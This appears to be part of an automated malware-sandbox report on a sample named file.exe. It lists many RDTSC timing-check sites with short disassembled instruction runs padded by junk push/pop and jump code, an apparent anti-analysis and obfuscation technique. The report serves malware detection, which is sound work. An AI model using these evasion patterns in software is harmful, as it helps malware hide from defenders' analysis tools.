          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BA93 second address: C0BA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0BEFF second address: C0BF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE89h 0x00000009 popad 0x0000000a jnc 00007F174075FE82h 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 jmp 00007F174075FE84h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0C0A8 second address: C0C0C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17414E3402h 0x00000008 jng 00007F17414E33F6h 0x0000000e jc 00007F17414E33F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F17414E33F6h 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CDC8 second address: C0CDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CDCC second address: C0CDEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F17414E33FCh 0x0000000c push esi 0x0000000d jmp 00007F17414E33FEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FCD6 second address: C0FCE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F174075FE76h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FCE7 second address: C0FCEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FCEB second address: C0FCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FCF1 second address: C0FD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0FD02 second address: C0FD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F8BA second address: C0F8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F17414E33FBh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F8D9 second address: C0F8E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F8E4 second address: C0F90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E33FBh 0x00000009 jmp 00007F17414E3406h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F90B second address: C0F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F174075FE7Ch 0x0000000b ja 00007F174075FE76h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1B4F6 second address: C1B4FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C20BF6 second address: C20BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C20BFA second address: C20C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F17414E33FAh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jp 00007F17414E340Ch 0x00000018 jmp 00007F17414E3406h 0x0000001d popad 0x0000001e push ecx 0x0000001f jnl 00007F17414E33F8h 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22F22 second address: C22F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22F26 second address: C22F32 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F17414E33F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22F32 second address: C22F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22DCC second address: C22DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C22DD0 second address: C22DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F174075FE7Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C255A3 second address: C255C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F17414E33F6h 0x00000009 jmp 00007F17414E3405h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25442 second address: C2544F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F174075FE76h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2544F second address: C25455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1E7B6 second address: C1E7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE84h 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1E7CF second address: C1E7D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1E7D7 second address: C1E7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31DB7 second address: C31DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31BDB second address: C31C03 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F174075FE76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jbe 00007F174075FE76h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jg 00007F174075FE76h 0x0000001d jo 00007F174075FE76h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31C03 second address: C31C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31C09 second address: C31C0F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31C0F second address: C31C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17414E33FCh 0x00000008 js 00007F17414E33F6h 0x0000000e jmp 00007F17414E3407h 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34AD7 second address: C34ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C346D6 second address: C34705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F17414E3407h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49112 second address: C49121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49121 second address: C49125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49125 second address: C4912B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C492B6 second address: C492D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E3409h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C492D3 second address: C492D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49B45 second address: C49B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3404h 0x00000007 jng 00007F17414E33F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F17414E33FBh 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49E47 second address: C49E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F174075FE76h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4A026 second address: C4A02C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CED1 second address: C4CEE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE82h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CEE7 second address: C4CEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E317 second address: C4E32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F174075FE76h 0x0000000a popad 0x0000000b jmp 00007F174075FE7Ah 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E32C second address: C4E332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E332 second address: C4E336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4E336 second address: C4E35A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F17414E3407h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4FB22 second address: C4FB40 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F174075FE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F174075FE7Eh 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0035E second address: 4C00375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3403h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00375 second address: 4C00379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00379 second address: 4C00387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00387 second address: 4C003A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F174075FE7Ch 0x0000000a or ch, 00000018h 0x0000000d jmp 00007F174075FE7Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003A8 second address: 4C003E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17414E3408h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003E3 second address: 4C003E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003E7 second address: 4C003ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003ED second address: 4C00432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F174075FE7Dh 0x00000013 adc si, 5176h 0x00000018 jmp 00007F174075FE81h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ecx, dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00432 second address: 4C00436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00436 second address: 4C0043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0043A second address: 4C00440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2057E second address: 4C2059C instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F174075FE83h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2059C second address: 4C205A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205A1 second address: 4C205C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F174075FE85h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205C5 second address: 4C205C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205C9 second address: 4C205CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205CF second address: 4C205FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17414E3400h 0x00000009 adc si, 41A8h 0x0000000e jmp 00007F17414E33FBh 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C205FF second address: 4C2061A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov ax, di 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edx 0x00000010 jmp 00007F174075FE7Ah 0x00000015 popad 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2061A second address: 4C20620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20620 second address: 4C20658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F174075FE7Ah 0x00000015 jmp 00007F174075FE85h 0x0000001a popfd 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20658 second address: 4C20695 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F17414E3400h 0x00000008 add esi, 2D60D3F8h 0x0000000e jmp 00007F17414E33FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov edi, ecx 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F17414E3400h 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20695 second address: 4C206CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F174075FE82h 0x00000012 and cl, FFFFFFB8h 0x00000015 jmp 00007F174075FE7Bh 0x0000001a popfd 0x0000001b movzx ecx, di 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C206CF second address: 4C20737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 mov edx, eax 0x00000009 pushfd 0x0000000a jmp 00007F17414E3402h 0x0000000f xor ecx, 1A8FD248h 0x00000015 jmp 00007F17414E33FBh 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [esp], esi 0x0000001f jmp 00007F17414E3406h 0x00000024 lea eax, dword ptr [ebp-04h] 0x00000027 pushad 0x00000028 mov ecx, 2DA0C2FDh 0x0000002d mov di, si 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F17414E33FEh 0x0000003b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20737 second address: 4C20746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C207AF second address: 4C20855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17414E3401h 0x00000009 sub esi, 6E554E46h 0x0000000f jmp 00007F17414E3401h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F17414E3400h 0x0000001b sub ax, 12E8h 0x00000020 jmp 00007F17414E33FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 cmp dword ptr [ebp-04h], 00000000h 0x0000002d jmp 00007F17414E3406h 0x00000032 mov esi, eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push edx 0x00000038 pop eax 0x00000039 pushfd 0x0000003a jmp 00007F17414E3409h 0x0000003f sbb eax, 02922A66h 0x00000045 jmp 00007F17414E3401h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2000B second address: 4C20010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20010 second address: 4C20029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3405h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20029 second address: 4C2004D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F174075FE89h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2004D second address: 4C20070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov edi, 5A05CDFEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F17414E3400h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20070 second address: 4C20098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F174075FE85h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20098 second address: 4C2009E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2009E second address: 4C200A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200A2 second address: 4C200D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3403h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17414E3405h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200D4 second address: 4C200DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200DA second address: 4C200DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C200DE second address: 4C2018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 4EC1137Ah 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F174075FE82h 0x00000014 or ecx, 4D9C9418h 0x0000001a jmp 00007F174075FE7Bh 0x0000001f popfd 0x00000020 mov ax, 2FCFh 0x00000024 popad 0x00000025 add dword ptr [esp], 27D98ACEh 0x0000002c pushad 0x0000002d jmp 00007F174075FE80h 0x00000032 mov bx, si 0x00000035 popad 0x00000036 call 00007F174075FE79h 0x0000003b pushad 0x0000003c movsx ebx, si 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007F174075FE7Bh 0x00000046 mov eax, dword ptr [esp+04h] 0x0000004a jmp 00007F174075FE89h 0x0000004f mov eax, dword ptr [eax] 0x00000051 jmp 00007F174075FE81h 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F174075FE7Ch 0x00000061 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2018E second address: 4C201C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F17414E3406h 0x0000000f mov eax, dword ptr fs:[00000000h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201C0 second address: 4C201C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
